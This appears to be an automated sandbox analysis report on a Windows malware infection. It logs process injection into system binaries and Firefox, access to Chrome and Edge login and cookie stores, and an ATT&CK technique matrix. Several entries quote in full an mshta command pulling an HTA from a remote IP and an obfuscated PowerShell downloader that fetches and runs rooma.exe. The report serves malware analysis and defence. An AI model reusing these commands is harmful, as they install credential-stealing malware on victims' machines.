          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015904E5 mov ecx, dword ptr fs:[00000030h]7_2_015904E5
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016654DB mov eax, dword ptr fs:[00000030h]7_2_016654DB
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161A4B0 mov eax, dword ptr fs:[00000030h]7_2_0161A4B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B480 mov eax, dword ptr fs:[00000030h]7_2_0158B480
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01599486 mov eax, dword ptr fs:[00000030h]7_2_01599486
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01599486 mov eax, dword ptr fs:[00000030h]7_2_01599486
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C34B0 mov eax, dword ptr fs:[00000030h]7_2_015C34B0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtOpenKeyEx: Direct from: 0x77463C9CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtClose: Direct from: 0x77462B6C
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtQueryValueKey: Direct from: 0x77462BECJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
          Source: C:\Users\user\AppData\Roaming\rooma.exeSection loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\rooma.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 8128Jump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.htaJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe" Jump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function lqhlh($iaxounjq, $bjgcheb){[io.file]::writeallbytes($iaxounjq, $bjgcheb)};function zkkoodnkdoxlr($iaxounjq){if($iaxounjq.endswith((kgqievzjx @(47125,47179,47187,47187))) -eq $true){rundll32.exe $iaxounjq }elseif($iaxounjq.endswith((kgqievzjx @(47125,47191,47194,47128))) -eq $true){powershell.exe -executionpolicy unrestricted -file $iaxounjq}elseif($iaxounjq.endswith((kgqievzjx @(47125,47188,47194,47184))) -eq $true){misexec /qn /i $iaxounjq}else{start-process $iaxounjq}};function fbuysivjpuzdjbgt($weuptawbrgutyylesbej){$tpkepuydmoafjohrfuef = new-object (kgqievzjx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$bjgcheb = $tpkepuydmoafjohrfuef.downloaddata($weuptawbrgutyylesbej);return $bjgcheb};function kgqievzjx($ethmockqiu){$kiwxaguqzybt=47079;$pdfpjjruzxwzezix=$null;foreach($qnjiurds in $ethmockqiu){$pdfpjjruzxwzezix+=[char]($qnjiurds-$kiwxaguqzybt)};return $pdfpjjruzxwzezix};function imobwpugekddhys(){$bznvnmxsa = $env:appdata + '\';$flaod = $bznvnmxsa + 'rooma.exe'; if (test-path -path $flaod){zkkoodnkdoxlr $flaod;}else{ $movknubo = fbuysivjpuzdjbgt (kgqievzjx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));lqhlh $flaod $movknubo;zkkoodnkdoxlr $flaod;};;;;}imobwpugekddhys;
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function lqhlh($iaxounjq, $bjgcheb){[io.file]::writeallbytes($iaxounjq, $bjgcheb)};function zkkoodnkdoxlr($iaxounjq){if($iaxounjq.endswith((kgqievzjx @(47125,47179,47187,47187))) -eq $true){rundll32.exe $iaxounjq }elseif($iaxounjq.endswith((kgqievzjx @(47125,47191,47194,47128))) -eq $true){powershell.exe -executionpolicy unrestricted -file $iaxounjq}elseif($iaxounjq.endswith((kgqievzjx @(47125,47188,47194,47184))) -eq $true){misexec /qn /i $iaxounjq}else{start-process $iaxounjq}};function fbuysivjpuzdjbgt($weuptawbrgutyylesbej){$tpkepuydmoafjohrfuef = new-object (kgqievzjx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$bjgcheb = $tpkepuydmoafjohrfuef.downloaddata($weuptawbrgutyylesbej);return $bjgcheb};function kgqievzjx($ethmockqiu){$kiwxaguqzybt=47079;$pdfpjjruzxwzezix=$null;foreach($qnjiurds in $ethmockqiu){$pdfpjjruzxwzezix+=[char]($qnjiurds-$kiwxaguqzybt)};return $pdfpjjruzxwzezix};function imobwpugekddhys(){$bznvnmxsa = $env:appdata + '\';$flaod = $bznvnmxsa + 'rooma.exe'; if (test-path -path $flaod){zkkoodnkdoxlr $flaod;}else{ $movknubo = fbuysivjpuzdjbgt (kgqievzjx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));lqhlh $flaod $movknubo;zkkoodnkdoxlr $flaod;};;;;}imobwpugekddhys;Jump to behavior
          Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
          Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          312
          Process Injection
          11
          Masquerading
          1
          OS Credential Dumping
          131
          Security Software Discovery
          Remote Services11
          Email Collection
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          PowerShell
          Boot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism
          41
          Virtualization/Sandbox Evasion
          LSASS Memory12
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          13
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
